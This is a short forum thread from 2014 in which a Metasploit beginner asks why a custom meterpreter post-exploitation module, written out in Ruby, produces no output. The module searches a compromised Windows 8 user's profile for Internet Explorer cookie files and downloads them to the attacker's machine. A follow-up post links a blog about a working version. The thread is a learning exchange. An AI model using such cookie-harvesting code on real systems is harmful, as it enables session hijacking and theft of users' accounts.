-=bb=- Posted February 17, 2014 Posted February 17, 2014 Hi, Complete beginner with Metasploit, so please be gentle! I noticed that the enum_ie module doesn't work for Windows 8 clients so was trying to put a script together to download the cookie files in our test environment. I figured it would be a pretty simple exercise in learning my way around the scripting and exploring post exploitation automation as I wanted to include the script as part of the AutoRunScript rc file. When I run the script in a meterpreter session, I get absolutely no output and I am sure that I am missing something obvious but googling hasn't thrown up anything that I can see. Here is my script : require 'msf/core' require 'msf/core/post/file' class Metasploit3 < Msf::Post include Msf::Post::File def initialize(info={}) super( update_info( info, 'Name' => 'Find Windows Cookies', 'Description' => %q{ This POST module attempts to download Windows 7 or 8 cookies }, 'License' => MSF_LICENSE, 'Author' => [ '-=bb=- ' ], 'Version' => '$Revision: 1.0 $', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) end def run begin base = session.fs.file.expand_path("%USERPROFILE%") location << base + "\\AppData\\Local\\Microsoft\\Windows\\InetCookies" #windows 8 target = client.sys.config.sysinfo["Computer"] file_type = "*.txt*" dump = "/tmp" dump = dump + target print_status("") print_status("\tSearching for and downloading cookies...") print_status("") getfile = client.fs.file.search(location,file_type,recurse=true,timeout=-1) getfile.each do |file| print_status("Found #{file['path']}\\#{file['name']}...Saving in - #{dump}") client.fs.file.download(dump, "#{file['path']}\\#{file['name']}") end end end end Could anybody point out what bone-headedness I'm performing wrong? Many thanks in advance Quote
-=bb=- Posted May 27, 2014 Author Posted May 27, 2014 I never quite managed to solve the output issue. However I did write a blog post detailing my endeavors and how I ultimately ended up with a reliable working exploit for Windows 8 cookies here : http://blog.interrupt3h.com/?p=286 It still needs polishing for general release (as detailed in the blog post) as well as some error handling and some better clean up but that's for the next rainy bank holiday :) Hope it helps someone. Would welcome any feedback on my approach. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.